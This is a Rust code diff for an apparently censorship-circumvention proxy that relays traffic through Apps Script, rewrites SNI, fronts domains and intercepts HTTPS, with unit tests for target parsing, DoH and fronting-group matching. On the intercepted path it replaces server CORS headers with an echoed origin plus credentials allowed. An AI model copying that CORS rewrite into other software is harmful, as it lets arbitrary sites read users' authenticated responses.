+/// separator and returns a rewritten head block, again including the
+/// `\r\n\r\n` terminator. Returns `None` if the head block isn't valid
+/// UTF-8 — the caller should pass the original bytes through unchanged
+/// in that case. Every existing `Access-Control-*` line is dropped and
+/// a fixed set keyed on `origin`, plus `Vary: Origin`, is appended.
+///
+/// Split out so the range-parallel streaming path can apply CORS
+/// rewrites to the response head before the body has been assembled
+/// (where the buffered path could just rewrite the finished blob).
+pub(crate) fn inject_cors_into_head(head_with_terminator: &[u8], origin: &str) -> Option<Vec<u8>> {
+    let sep = b"\r\n\r\n";
+    let head = head_with_terminator
+        .strip_suffix(sep)
+        .unwrap_or(head_with_terminator);
+    let head_str = std::str::from_utf8(head).ok()?;
+
+    let mut out = String::with_capacity(head.len() + 256);
+    let mut lines = head_str.split("\r\n");
+    if let Some(status) = lines.next() {
+        out.push_str(status); // first line is the status line; copied verbatim
+        out.push_str("\r\n");
+    }
+    // Rebuild the header block, dropping any pre-existing
+    // `Access-Control-*` lines (matched case-insensitively) so the
+    // destination's value can't conflict with ours.
+    for line in lines {
+        let lower = line.to_ascii_lowercase();
+        if lower.starts_with("access-control-") {
+            continue;
+        }
+        out.push_str(line);
+        out.push_str("\r\n");
+    }
+    // Inject our own; `Vary: Origin` keeps shared caches from reusing
+    // one origin's CORS-tagged response for another. NOTE(review): per
+    // Fetch, `*` is literal on credentialed requests — confirm intent.
+    out.push_str("Access-Control-Allow-Origin: ");
+    out.push_str(origin);
+    out.push_str("\r\n");
+    out.push_str("Access-Control-Allow-Credentials: true\r\n");
+    out.push_str("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD\r\n");
+    out.push_str("Access-Control-Allow-Headers: *\r\n");
+    out.push_str("Access-Control-Expose-Headers: *\r\n");
+    out.push_str("Vary: Origin\r\n");
+    out.push_str("\r\n"); // blank line terminating the head
+
+    Some(out.into_bytes())
+}
+
 fn expects_100_continue(headers: &[(String, String)]) -> bool {
     header_value(headers, "expect")
         .map(|v| {
@@ -2190,19 +2893,196 @@ async fn do_plain_http(
     // Plain HTTP proxy path — same range-parallel strategy as the
     // MITM-HTTPS path above. Large downloads on port 80 (package
     // mirrors, video poster streams, etc.) need the same acceleration
-    // or the relay stalls per-chunk.
-    let response = if method.eq_ignore_ascii_case("GET") && body.is_empty() {
+    // or the relay stalls per-chunk. No CORS injection on this path —
+    // plain-http proxy traffic isn't a browser-MITM flow, so the
+    // origin's response headers go through unchanged.
+    if method.eq_ignore_ascii_case("GET") && body.is_empty() {
         fronter
-            .relay_parallel_range(&method, &url, &headers, &body)
-            .await
+            .relay_parallel_range_to(
+                &mut sock,
+                &method,
+                &url,
+                &headers,
+                &body,
+                |head: &[u8]| head.to_vec(),
+            )
+            .await?;
     } else {
-        fronter.relay(&method, &url, &headers, &body).await
-    };
-    sock.write_all(&response).await?;
+        let response = fronter.relay(&method, &url, &headers, &body).await;
+        sock.write_all(&response).await?;
+    }
     sock.flush().await?;
     Ok(())
 }
 
+/// `direct` mode plain-HTTP passthrough. The CONNECT path already
+/// falls through to raw TCP for hosts outside the SNI-rewrite set in
+/// `direct`; this is the same idea for the `GET http://…` proxy form
+/// so a bare `http://example.com` typed in the address bar doesn't 502.
+///
+/// Rewrites the absolute-form request line to origin form, drops
+/// `Proxy-Connection` / `Connection` / `Keep-Alive`, and forces
+/// `Connection: close` so a keep-alive client can't pipeline a request
+/// to a different host onto the spliced socket; then dials the origin
+/// (`upstream_socks5` first if set) and splices both directions.
+async fn do_plain_http_passthrough(
+    mut sock: TcpStream,
+    head: &[u8],
+    leftover: &[u8],
+    rewrite_ctx: &RewriteCtx,
+) -> std::io::Result<()> {
+    let (method, target, version, headers) = match parse_request_head(head) {
+        Some(v) => v,
+        None => return Ok(()), // unparseable head: give up without replying
+    };
+
+    let (host, port, path) = match resolve_plain_http_target(&target, &headers) {
+        Some(v) => v,
+        None => {
+            tracing::debug!("plain-http passthrough: cannot parse target {}", target);
+            return Ok(());
+        }
+    };
+
+    tracing::info!(
+        "dispatch http {}:{} -> raw-tcp ({}) (direct mode: no relay)",
+        host,
+        port,
+        rewrite_ctx.upstream_socks5.as_deref().unwrap_or("direct"),
+    );
+
+    // Re-serialize the head: origin-form request line, then every header except the three dropped below.
+    let mut rewritten = Vec::with_capacity(head.len());
+    rewritten.extend_from_slice(method.as_bytes());
+    rewritten.push(b' ');
+    rewritten.extend_from_slice(path.as_bytes());
+    rewritten.push(b' ');
+    rewritten.extend_from_slice(version.as_bytes());
+    rewritten.extend_from_slice(b"\r\n");
+    for (k, v) in &headers {
+        let kl = k.to_ascii_lowercase();
+        if kl == "proxy-connection" || kl == "connection" || kl == "keep-alive" {
+            continue;
+        }
+        rewritten.extend_from_slice(k.as_bytes());
+        rewritten.extend_from_slice(b": ");
+        rewritten.extend_from_slice(v.as_bytes());
+        rewritten.extend_from_slice(b"\r\n");
+    }
+    rewritten.extend_from_slice(b"Connection: close\r\n\r\n");
+
+    let target_host = host.trim_start_matches('[').trim_end_matches(']'); // unbracket IPv6 literals for the dialer
+    let connect_timeout = if looks_like_ip(target_host) { // 4 s when flagged as an IP, else 10 s
+        std::time::Duration::from_secs(4)
+    } else {
+        std::time::Duration::from_secs(10)
+    };
+    let upstream = if let Some(proxy) = rewrite_ctx.upstream_socks5.as_deref() {
+        match socks5_connect_via(proxy, target_host, port).await { // NOTE(review): `connect_timeout` is not applied to this dial
+            Ok(s) => s,
+            Err(e) => {
+                tracing::warn!(
+                    "upstream-socks5 {} -> {}:{} failed: {} (falling back to direct)",
+                    proxy,
+                    host,
+                    port,
+                    e
+                );
+                match tokio::time::timeout(
+                    connect_timeout,
+                    TcpStream::connect((target_host, port)),
+                )
+                .await
+                {
+                    Ok(Ok(s)) => s,
+                    _ => return Ok(()), // NOTE(review): fallback failure/timeout is dropped without a log line
+                }
+            }
+        }
+    } else {
+        match tokio::time::timeout(connect_timeout, TcpStream::connect((target_host, port))).await {
+            Ok(Ok(s)) => s,
+            Ok(Err(e)) => {
+                tracing::debug!("plain-http connect {}:{} failed: {}", host, port, e);
+                return Ok(());
+            }
+            Err(_) => {
+                tracing::debug!("plain-http connect {}:{} timeout", host, port);
+                return Ok(());
+            }
+        }
+    };
+    let _ = upstream.set_nodelay(true); // best-effort: a failure here is ignored
+
+    let (mut ar, mut aw) = sock.split();
+    let (mut br, mut bw) = upstream.into_split();
+    bw.write_all(&rewritten).await?;
+    if !leftover.is_empty() {
+        bw.write_all(leftover).await?; // bytes already read past the head are forwarded first
+    }
+    let t1 = tokio::io::copy(&mut ar, &mut bw);
+    let t2 = tokio::io::copy(&mut br, &mut aw);
+    tokio::select! { // returns as soon as either copy direction finishes
+        _ = t1 => {}
+        _ = t2 => {}
+    }
+    Ok(())
+}
+
+/// Parse the target of a plain-HTTP proxy request line into
+/// `(host, port, origin-form-path)`. Accepts absolute form
+/// (`http://host[:port]/path`, or `https://` defensively) and the
+/// origin-form fallback (`/path` plus a `Host:` header) used by
+/// transparent-proxy clients. A path-less target keeps its query:
+/// `http://host?q` becomes `/?q`. Returns `None` for anything else.
+fn resolve_plain_http_target(
+    target: &str,
+    headers: &[(String, String)],
+) -> Option<(String, u16, String)> {
+    let (rest, default_port) = if let Some(r) = target.strip_prefix("http://") {
+        (r, 80u16)
+    } else if let Some(r) = target.strip_prefix("https://") {
+        (r, 443u16)
+    } else if target.starts_with('/') {
+        let (_, host_header) = headers
+            .iter()
+            .find(|(k, _)| k.eq_ignore_ascii_case("host"))?;
+        let (host, port) = split_authority(host_header, 80);
+        return Some((host, port, target.to_string()));
+    } else {
+        return None;
+    };
+    // The authority ends at the first `/` or `?` (RFC 3986 §3.2); origin form needs a leading `/`.
+    let (authority, path) = match rest.find(|c: char| c == '/' || c == '?') {
+        Some(i) if rest[i..].starts_with('?') => (&rest[..i], format!("/{}", &rest[i..])),
+        Some(i) => (&rest[..i], rest[i..].to_string()),
+        None => (rest, "/".to_string()),
+    };
+    if authority.is_empty() {
+        return None;
+    }
+    let (host, port) = split_authority(authority, default_port);
+    Some((host, port, path))
+}
+
+/// Split an `authority` (`host[:port]`, with optional IPv6 brackets) into
+/// `(host, port)`; an absent or empty port (`host:`) means `default_port`.
+fn split_authority(authority: &str, default_port: u16) -> (String, u16) {
+    // Bare IPv6 (multiple colons, no brackets): take it whole, since
+    // `rsplit_once(':')` would otherwise mangle `::1` into `(":", 1)`.
+    let colons = authority.bytes().filter(|&b| b == b':').count();
+    if colons > 1 && !authority.starts_with('[') {
+        return (authority.to_string(), default_port);
+    }
+    if let Some((h, p)) = authority.rsplit_once(':') {
+        let port = if p.is_empty() { Some(default_port) } else { p.parse().ok() };
+        if let Some(port) = port {
+            return (h.to_string(), port);
+        }
+    }
+    (authority.to_string(), default_port)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -2215,6 +3095,63 @@ mod tests {
             .collect()
     }
 
+    #[test]
+    fn resolve_plain_http_target_parses_absolute_form() {
+        let h = headers(&[]); // absolute form: no `Host:` header is consulted
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com/", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 80); // `http://` default port
+        assert_eq!(path, "/");
+
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com:8080/foo?x=1", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 8080); // explicit port wins over the scheme default
+        assert_eq!(path, "/foo?x=1"); // query string stays attached to the path
+
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 80);
+        assert_eq!(path, "/"); // missing path defaults to `/`
+    }
+
+    #[test]
+    fn resolve_plain_http_target_falls_back_to_host_header() {
+        let h = headers(&[("Host", "example.com:8080")]);
+        let (host, port, path) = resolve_plain_http_target("/foo", &h).unwrap(); // origin-form target
+        assert_eq!(host, "example.com"); // host comes from the `Host:` header
+        assert_eq!(port, 8080); // and so does the port
+        assert_eq!(path, "/foo"); // the target itself is returned as the path
+    }
+
+    #[test]
+    fn resolve_plain_http_target_rejects_bare_authority() {
+        // No scheme and no leading `/` — not something we can route.
+        assert!(resolve_plain_http_target("example.com", &headers(&[])).is_none());
+        assert!(resolve_plain_http_target("http://", &headers(&[])).is_none()); // scheme but empty authority
+    }
+
+    #[test]
+    fn split_authority_handles_ports_and_ipv6() {
+        assert_eq!(
+            split_authority("example.com", 80), // no port: default applies
+            ("example.com".to_string(), 80)
+        );
+        assert_eq!(
+            split_authority("example.com:8080", 80), // explicit port overrides the default
+            ("example.com".to_string(), 8080)
+        );
+        assert_eq!(
+            split_authority("[::1]:8080", 80), // bracketed IPv6: brackets stay on the host
+            ("[::1]".to_string(), 8080)
+        );
+        // Bare IPv6 without brackets — the whole string is kept as the
+        // host and the default port is used; no split on an inner colon.
+        assert_eq!(split_authority("::1", 80), ("::1".to_string(), 80));
+    }
+
     #[test]
     fn socks5_udp_domain_packet_round_trips() {
         let mut raw = vec![0, 0, 0, 0x03, 11];
@@ -2366,36 +3303,77 @@ mod tests {
 
     #[test]
     fn youtube_via_relay_routes_youtube_through_relay_path() {
-        // Issue #102. When youtube_via_relay=true, YouTube suffixes
-        // must NOT match the SNI-rewrite path, so traffic falls
-        // through to Apps Script relay. Other Google suffixes are
-        // unaffected.
+        // Issue #102 + #275. When youtube_via_relay=true:
+        //   - YouTube API + HTML hosts (where Restricted Mode lives)
+        //     opt out of SNI rewrite so they go through the relay.
+        //   - YouTube image / video / channel-asset CDNs STAY on SNI
+        //     rewrite — Restricted Mode isn't enforced on those, and
+        //     routing video chunks through Apps Script burns quota
+        //     and risks the 6-min execution cap. Pre-#275 ytimg.com
+        //     was incorrectly carved out alongside the API surfaces.
+        //   - Non-YouTube Google suffixes are unaffected by the flag.
         let hosts = std::collections::HashMap::new();
 
-        // Default behaviour: everything in the pool rewrites.
+        // Default behaviour (flag off): everything in the SNI pool
+        // rewrites including all YouTube assets.
+        assert!(should_use_sni_rewrite(&hosts, "www.youtube.com", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false));
         assert!(should_use_sni_rewrite(
             &hosts,
-            "www.youtube.com",
+            "youtubei.googleapis.com",
             443,
             false
         ));
-        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false));
-        assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false));
-        assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false));
 
-        // With the toggle on: YouTube opts out, Google stays.
+        // googlevideo.com is INTENTIONALLY NOT in SNI_REWRITE_SUFFIXES
+        // — see the long note at the top of the SNI list. v1.7.4 tried
+        // adding it; reverted in v1.7.6 after user reports of total
+        // YouTube breakage. If the project ever ships an EVA-edge-IP
+        // config knob, this assertion can flip. Until then, video
+        // chunks correctly fall through to the Apps Script relay path
+        // and this assertion guards against a regression.
         assert!(!should_use_sni_rewrite(
             &hosts,
-            "www.youtube.com",
+            "rr1---sn-abc.googlevideo.com",
             443,
-            true
+            false
         ));
-        assert!(!should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true));
+
+        // Flag on: only the API + HTML hosts opt out.
+        assert!(!should_use_sni_rewrite(&hosts, "www.youtube.com", 443, true));
         assert!(!should_use_sni_rewrite(&hosts, "youtu.be", 443, true));
+        assert!(!should_use_sni_rewrite(
+            &hosts,
+            "www.youtube-nocookie.com",
+            443,
+            true
+        ));
+        assert!(!should_use_sni_rewrite(
+            &hosts,
+            "youtubei.googleapis.com",
+            443,
+            true
+        ));
+
+        // Flag on: image / channel-asset CDNs STAY on SNI rewrite. Pre-#275
+        // ytimg.com was incorrectly carved out alongside the API surfaces.
+        // googlevideo.com still goes through the relay path (not in the
+        // SNI list at all — see note above the SNI_REWRITE_SUFFIXES
+        // entries) so the same flag-on assertion isn't applicable to it.
+        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true));
+        assert!(should_use_sni_rewrite(&hosts, "yt3.ggpht.com", 443, true));
+
+        // Flag on: non-YouTube Google suffixes are unaffected. Note
+        // youtubei.googleapis.com (above) is the *carve-out* — the
+        // broader googleapis.com suffix is NOT carved out, so e.g.
+        // Drive / Calendar / etc. continue to SNI-rewrite.
         assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, true));
+        assert!(should_use_sni_rewrite(&hosts, "fonts.gstatic.com", 443, true));
         assert!(should_use_sni_rewrite(
             &hosts,
-            "fonts.gstatic.com",
+            "drive.googleapis.com",
             443,
             true
         ));
@@ -2444,6 +3422,69 @@ mod tests {
         assert!(!matches_passthrough("", &list));
     }
 
+    #[test]
+    fn inject_cors_response_headers_replaces_existing_acl_with_origin_echo() {
+        // Origin server returned `Access-Control-Allow-Origin: *` which
+        // browsers reject when paired with `Allow-Credentials: true` (the
+        // YouTube comments failure mode). Our injection must strip the
+        // wildcard and substitute the request's actual origin so that
+        // credentialed requests succeed.
+        let response = b"HTTP/1.1 200 OK\r\n\
+                        Content-Type: application/json\r\n\
+                        Access-Control-Allow-Origin: *\r\n\
+                        Access-Control-Allow-Methods: GET\r\n\
+                        Content-Length: 12\r\n\
+                        \r\n\
+                        {\"a\":\"b\"}xx";
+        let injected = inject_cors_response_headers(response, "https://www.youtube.com");
+        let s = std::str::from_utf8(&injected).unwrap();
+        // Original wildcard must be gone.
+        assert!(
+            !s.contains("Access-Control-Allow-Origin: *"),
+            "wildcard origin must be stripped, got: {}",
+            s
+        );
+        // Echoed origin + credentials must be present.
+        assert!(s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+        assert!(s.contains("Access-Control-Allow-Credentials: true\r\n"));
+        // Body preserved byte-for-byte.
+        assert!(injected.ends_with(b"{\"a\":\"b\"}xx"));
+        // Status line preserved.
+        assert!(s.starts_with("HTTP/1.1 200 OK\r\n"));
+    }
+
+    #[test]
+    fn inject_cors_response_headers_preserves_non_acl_headers() {
+        // Non-ACL headers (Content-Type, Set-Cookie, Cache-Control, …)
+        // must pass through unchanged. Only `Access-Control-*` lines
+        // are stripped.
+        let response = b"HTTP/1.1 200 OK\r\n\
+                        Content-Type: text/html\r\n\
+                        Set-Cookie: a=1\r\n\
+                        Cache-Control: max-age=300\r\n\
+                        Access-Control-Allow-Origin: https://other.example\r\n\
+                        \r\n\
+                        body";
+        let injected = inject_cors_response_headers(response, "https://www.youtube.com");
+        let s = std::str::from_utf8(&injected).unwrap();
+        assert!(s.contains("Content-Type: text/html\r\n"));
+        assert!(s.contains("Set-Cookie: a=1\r\n"));
+        assert!(s.contains("Cache-Control: max-age=300\r\n"));
+        // Wrong origin replaced.
+        assert!(!s.contains("Access-Control-Allow-Origin: https://other.example\r\n"));
+        assert!(s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+    }
+
+    #[test]
+    fn inject_cors_response_headers_returns_unchanged_when_no_header_terminator() {
+        // A response missing the `\r\n\r\n` separator (e.g. raw error
+        // blob, truncated upstream) must round-trip unchanged so we
+        // don't corrupt non-HTTP/1.x bytes.
+        let response = b"not an http response";
+        let injected = inject_cors_response_headers(response, "https://x.com");
+        assert_eq!(injected.as_slice(), response);
+    }
+
     #[test]
     fn passthrough_hosts_ignores_empty_and_whitespace_entries() {
         let list = vec!["".to_string(), "   ".to_string(), "real.com".to_string()];
@@ -2459,4 +3500,152 @@ mod tests {
         assert!(matches_passthrough("example.com", &list));
         assert!(matches_passthrough("example.com.", &list));
     }
+
+    #[test]
+    fn doh_default_list_exact_matches() {
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("chrome.cloudflare-dns.com", &extra));
+        assert!(matches_doh_host("dns.google", &extra));
+        assert!(matches_doh_host("dns.quad9.net", &extra));
+        assert!(matches_doh_host("doh.opendns.com", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_case_insensitive_and_trailing_dot() {
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("DNS.GOOGLE", &extra));
+        assert!(matches_doh_host("dns.google.", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_suffix_match_for_tenant_subdomains() {
+        // `cloudflare-dns.com` is in the default list — Workers-hosted
+        // tenant DoH endpoints sit under it and should match too.
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("tenant.cloudflare-dns.com", &extra));
+        // But a substring match must NOT pass: `xcloudflare-dns.com` is
+        // a different domain.
+        assert!(!matches_doh_host("xcloudflare-dns.com", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_unrelated_hosts_do_not_match() {
+        let extra: Vec<String> = vec![];
+        assert!(!matches_doh_host("example.com", &extra));
+        assert!(!matches_doh_host("googlevideo.com", &extra));
+        assert!(!matches_doh_host("", &extra));
+    }
+
+    #[test]
+    fn doh_extra_list_extends_default() {
+        let extra = vec![".internal-doh.example".to_string(), "doh.acme.test".to_string()];
+        // Defaults still match.
+        assert!(matches_doh_host("dns.google", &extra));
+        // User additions match.
+        assert!(matches_doh_host("doh.acme.test", &extra));
+        assert!(matches_doh_host("a.b.internal-doh.example", &extra));
+        // Unrelated still doesn't match.
+        assert!(!matches_doh_host("example.com", &extra));
+    }
+
+    #[test]
+    fn doh_extra_entries_match_subdomains_without_leading_dot() {
+        // Asymmetry footgun guard: user adds `doh.acme.test` and expects
+        // `tenant.doh.acme.test` to match too — same as `dns.google`
+        // matching `tenant.dns.google` from the default list. Unlike
+        // `passthrough_hosts`, DoH extras don't require a leading dot.
+        let extra = vec!["doh.acme.test".to_string()];
+        assert!(matches_doh_host("doh.acme.test", &extra));
+        assert!(matches_doh_host("tenant.doh.acme.test", &extra));
+        // But substring overlap must still be rejected.
+        assert!(!matches_doh_host("xdoh.acme.test", &extra));
+    }
+
+    fn fg(name: &str, sni: &str, domains: &[&str]) -> Arc<FrontingGroupResolved> {
+        Arc::new(
+            FrontingGroupResolved::from_config(&FrontingGroup {
+                name: name.into(),
+                ip: "127.0.0.1".into(),
+                sni: sni.into(),
+                domains: domains.iter().map(|s| s.to_string()).collect(),
+            })
+            .expect("test fronting group should resolve"),
+        )
+    }
+
+    #[test]
+    fn fronting_group_match_exact_and_suffix() {
+        let groups = vec![fg("vercel", "react.dev", &["vercel.com", "nextjs.org"])];
+        // Exact.
+        assert_eq!(
+            match_fronting_group("vercel.com", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Suffix.
+        assert_eq!(
+            match_fronting_group("app.vercel.com", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Different member.
+        assert_eq!(
+            match_fronting_group("docs.nextjs.org", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Non-member.
+        assert!(match_fronting_group("example.com", &groups).is_none());
+        // Substring overlap is NOT a match (xvercel.com isn't *.vercel.com).
+        assert!(match_fronting_group("xvercel.com", &groups).is_none());
+    }
+
+    #[test]
+    fn fronting_group_match_case_and_trailing_dot() {
+        let groups = vec![fg("fastly", "www.python.org", &["reddit.com"])];
+        assert_eq!(
+            match_fronting_group("Reddit.COM", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+        assert_eq!(
+            match_fronting_group("reddit.com.", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+        assert_eq!(
+            match_fronting_group("WWW.Reddit.com.", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+    }
+
+    #[test]
+    fn fronting_group_match_first_wins() {
+        // When a host is in two groups, the earlier group is chosen.
+        // Lets users put more-specific groups first.
+        let groups = vec![
+            fg("specific", "a.example", &["api.example.com"]),
+            fg("broad", "b.example", &["example.com"]),
+        ];
+        assert_eq!(
+            match_fronting_group("api.example.com", &groups).map(|g| g.name.as_str()),
+            Some("specific")
+        );
+        assert_eq!(
+            match_fronting_group("example.com", &groups).map(|g| g.name.as_str()),
+            Some("broad")
+        );
+    }
+
+    #[test]
+    fn fronting_group_match_empty_list() {
+        let groups: Vec<Arc<FrontingGroupResolved>> = Vec::new();
+        assert!(match_fronting_group("vercel.com", &groups).is_none());
+    }
+
+    #[test]
+    fn fronting_group_resolve_rejects_invalid_sni() {
+        let bad = FrontingGroup {
+            name: "bad".into(),
+            ip: "127.0.0.1".into(),
+            sni: "not a valid hostname".into(),
+            domains: vec!["x.com".into()],
+        };
+        assert!(FrontingGroupResolved::from_config(&bad).is_err());
+    }
 }
diff --git a/src/test_cmd.rs b/src/test_cmd.rs
index a9007a8d..b87c7fdd 100644
--- a/src/test_cmd.rs
+++ b/src/test_cmd.rs
@@ -20,10 +20,10 @@ use crate::domain_fronter::DomainFronter;
 const TEST_URL: &str = "https://api.ipify.org/?format=json";
 
 pub async fn run(config: &Config) -> bool {
-    if matches!(config.mode_kind(), Ok(Mode::GoogleOnly)) {
+    if matches!(config.mode_kind(), Ok(Mode::Direct)) {
         let msg = "`mhrv-rs test` probes the Apps Script relay, which isn't \
-                   wired up in google_only mode. Run `mhrv-rs test-sni` to \
-                   check the direct SNI-rewrite tunnel instead.";
+                   wired up in direct mode. Run `mhrv-rs test-sni` to check \
+                   the SNI-rewrite tunnel instead.";
         println!("{}", msg);
         tracing::error!("{}", msg);
         return false;
@@ -35,7 +35,7 @@ pub async fn run(config: &Config) -> bool {
         // back as the Apps Script datacenter — confusing because it
         // disagreed with what whatismyipaddress.com showed in the
         // browser (which DOES go through the tunnel). Rather than fake
-        // a passing test, refuse the same way we do for google_only and
+        // a passing test, refuse the same way we do for direct mode and
         // tell the user how to actually verify Full mode.
         let msg = "`mhrv-rs test` is wired only for the apps_script relay \
                    path. In full mode the data plane is the pipelined \
diff --git a/src/tunnel_client.rs b/src/tunnel_client.rs
index 72444e60..887561a3 100644
--- a/src/tunnel_client.rs
+++ b/src/tunnel_client.rs
@@ -5,7 +5,7 @@
 //! Each Apps Script deployment (account) gets its own concurrency pool of
 //! 30 in-flight requests — matching the per-account Apps Script limit.
 
-use std::collections::HashMap;
+use std::collections::{BTreeMap, HashMap};
 // `AtomicU64` from `std::sync::atomic` requires hardware-backed 64-bit
 // atomics, which 32-bit MIPS (`mipsel-unknown-linux-musl` — our OpenWRT
 // router target) does not provide — the std type isn't even defined
@@ -14,16 +14,18 @@ use std::collections::HashMap;
 // reason; reuse it here. `AtomicBool` works fine in std on every target.
 use portable_atomic::AtomicU64;
 use std::sync::atomic::{AtomicBool, Ordering};
-use std::sync::Arc;
+use std::sync::{Arc, Mutex};
 use std::time::{Duration, Instant};
 
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
+use bytes::{Bytes, BytesMut};
+use futures_util::stream::{FuturesUnordered, StreamExt};
 use tokio::io::{AsyncReadExt, AsyncWrite, AsyncWriteExt};
 use tokio::net::TcpStream;
 use tokio::sync::{mpsc, oneshot, Semaphore};
 
-use crate::domain_fronter::{BatchOp, DomainFronter, TunnelResponse};
+use crate::domain_fronter::{BatchOp, DomainFronter, FronterError, TunnelResponse};
 
 /// Apps Script allows 30 concurrent executions per account / deployment.
 const CONCURRENCY_PER_DEPLOYMENT: usize = 30;
@@ -38,15 +40,22 @@ const MAX_BATCH_PAYLOAD_BYTES: usize = 4 * 1024 * 1024;
 /// serializing too many sessions behind a single HTTP round-trip.
 const MAX_BATCH_OPS: usize = 50;
 
-/// Timeout for a single batch HTTP round-trip. If the tunnel-node or Apps
-/// Script takes longer than this, the batch fails and sessions get error
-/// replies rather than hanging forever.
-const BATCH_TIMEOUT: Duration = Duration::from_secs(30);
-
-/// Timeout for a session waiting for its batch reply. If the batch task
-/// is slow (e.g. one op in the batch has a dead target on the tunnel-node
-/// side), the session gives up and retries on the next tick rather than
-/// blocking indefinitely.
+// Per-batch HTTP round-trip timeout is now read from
+// `DomainFronter::batch_timeout()`, sourced from `Config::request_timeout_secs`
+// (#430, masterking32 PR #25). The historical default — 30 s, matching Apps
+// Script's typical response cliff — lives in `default_request_timeout_secs`
+// in `config.rs`.
+
+/// Slack added to the reply-timeout budget on top of `batch_timeout`.
+/// Covers spawn/encode overhead and a small margin for clock skew, so
+/// the session-side `reply_rx` doesn't fire just before `fire_batch`'s
+/// HTTP round-trip would have completed. No retry budget here — each
+/// batch makes exactly one attempt (see `fire_batch` docs).
+const REPLY_TIMEOUT_SLACK: Duration = Duration::from_secs(5);
+
+/// Per-inflight reply timeout used by the pipelined poll loop. Each
+/// in-flight future independently times out after this duration so a
+/// dead target on the tunnel-node side doesn't block the session.
 const REPLY_TIMEOUT: Duration = Duration::from_secs(35);
 
 /// How long we'll briefly hold the client socket after the local
@@ -55,6 +64,39 @@ const REPLY_TIMEOUT: Duration = Duration::from_secs(35);
 /// connect saves one Apps Script round-trip per new flow.
 const CLIENT_FIRST_DATA_WAIT: Duration = Duration::from_millis(50);
 
+/// Floor pipeline depth that a session falls back to once replies come back empty.
+const INFLIGHT_IDLE: usize = 1;
+
+/// Optimistic starting depth — every session gets 2 in-flight polls
+/// without needing an elevation permit. Drops to IDLE on first empty.
+const INFLIGHT_OPTIMIST: usize = 2;
+
+/// Maximum pipeline depth when data is actively flowing. Ramps up on
+/// data-bearing replies, drops back to IDLE after consecutive empties.
+const INFLIGHT_ACTIVE: usize = 4;
+
+/// How many consecutive empty replies before dropping from active to idle depth.
+const INFLIGHT_COOLDOWN: u32 = 3;
+
+/// Max sessions that can run at elevated pipeline depth per deployment.
+const MAX_ELEVATED_PER_DEPLOYMENT: u64 = 30;
+
+/// Adaptive coalesce defaults: after each new op arrives, wait another
+/// step for more ops. Resets on every arrival, up to max from the first
+/// op. Overridable via config `coalesce_step_ms` / `coalesce_max_ms`.
+///
+/// 200 ms balances latency against batching efficiency. The dominant
+/// bottleneck is the Apps Script round-trip (~1.5 s), so the extra
+/// 200 ms wait is negligible to the user but lets significantly more
+/// ops land in each batch — a page load that would fire 10 separate
+/// 1-op batches at 10 ms now packs 3–5 ops per batch, cutting the
+/// number of round-trips by more than half. On idle sessions the step
+/// timer fires once with nothing queued (no cost); under load each
+/// arriving op resets the timer, so rapid bursts still coalesce up to
+/// `DEFAULT_COALESCE_MAX_MS` naturally.
+const DEFAULT_COALESCE_STEP_MS: u64 = 200;
+const DEFAULT_COALESCE_MAX_MS: u64 = 1000;
+
 /// Structured error code the tunnel-node returns when it doesn't know the
 /// op (version mismatch). Must match `tunnel-node/src/main.rs`.
 const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
@@ -68,6 +110,111 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
 /// floor, so network jitter on either side won't false-trigger.
 const LEGACY_DETECT_THRESHOLD: Duration = Duration::from_millis(1500);
 
+/// How long a deployment stays in "legacy / no long-poll" mode after the
+/// last detection. Must be much longer than `LEGACY_DETECT_THRESHOLD` so a
+/// freshly-marked deployment doesn't immediately self-recover, but short
+/// enough that a redeployed / recovered tunnel-node gets re-probed without
+/// requiring a process restart. 60 s lets one stuck deployment widen its
+/// own poll cadence without poisoning the others, and self-resets so an
+/// upgraded tunnel-node returns to the long-poll fast path on its own.
+const LEGACY_RECOVER_AFTER: Duration = Duration::from_secs(60);
+
+/// How long to remember a `Network is unreachable` / `No route to host`
+/// failure for a given `(host, port)`. While cached, the proxy short-circuits
+/// repeat CONNECTs with an immediate "host unreachable" reply instead of
+/// burning a 1.5–2s tunnel batch round-trip on a target that just failed.
+/// Real motivator: IPv6-only probe hostnames (e.g. `ds6.probe.*`) on devices
+/// without IPv6 — the OS retries the probe every ~1.5s for 10s+, generating
+/// 5–10 wasted tunnel sessions per probe.
+const UNREACHABLE_CACHE_TTL: Duration = Duration::from_secs(30);
+
+/// Hard cap on negative-cache size. Browsing pulls in dozens of distinct
